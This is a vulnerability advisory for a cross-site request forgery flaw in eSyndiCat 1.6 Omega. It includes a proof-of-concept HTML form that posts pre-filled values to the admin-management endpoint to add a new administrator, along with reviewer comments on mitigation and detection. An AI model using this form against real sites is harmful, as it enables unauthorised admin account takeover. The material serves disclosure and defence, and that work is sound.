< ------------------- header data start ------------------- >
#############################################################
# Application Name : eSyndiCat 1.6 Omega
# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)
# Infection : A new admin can be added, or the admin password can be changed remotely and automatically (the forged request has to be sent by the browser of an admin who is logged in)
# Bug Fix Advice : A session key (session token) should be added to the form and verified on the server, and the old password should be asked for.
# author : Bug Researchers/system-hacker
############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Proof-of-concept markup from the advisory, reproduced as published.
  It is a plain HTML form that POSTs to admin/manage-admins.php?action=add
  with every field pre-filled. The only fields it sends are username,
  fullname, email, new_pass, new_pass2, submit_notif and save: there is no
  hidden session / anti-CSRF token field, which is the missing control the
  advisory's fix advice names.

  Reviewer notes (defensive):
  - Mitigation: the handler should reject any state-changing request that
    does not carry a valid per-session token checked on the server; as the
    advisory says, a password change should also ask for the current password.
  - Defence in depth: SameSite cookies for the admin session and an
    Origin/Referer check on admin POSTs.
  - Detection: admin-creation POSTs to this endpoint whose Origin/Referer is
    not the site's own admin panel, and admin accounts that appear without a
    matching operator action.
  - The markup is not well formed (unquoted attribute values, unmatched
    </td> tags), so read it as an illustration of the request shape only.
-->
<form action=http://omega.esyndicat.com/admin/manage-admins.php?action=add method=post name=manage_admins id=manage_admins>
<td width=200><strong>Admin username:</strong>
<input type=text name=username size=22 value=system/>
<strong>Admin Full Name:</strong>
<input type=text name=fullname size=22 value=exxe/>
<strong>Admin Email:</strong></td>
<!-- NOTE(review): "[email protected]" looks like an e-mail obfuscation placeholder left by the hosting page, not the author's original value; unconfirmed. -->
<input type=text name=email size=22 value=[email protected] />
<strong>Admin password:</strong></td>
<!-- new_pass and new_pass2 carry the password and its confirmation; no current-password field and no token accompany them. -->
<input type=password name=new_pass size=22 value=123456 />
<strong>Admin password Confirmation:</strong></td>
<input type=password name=new_pass2 size=22 value=123456 />
<td><strong>Submission Notification:</strong></td>
<input type=radio name=submit_notif value=1 id=lsn1 /><label for=lsn1>Enabled</label>
<input type=submit name=save value=Save Changes class=button />
</form>
< -- bug code end of -- >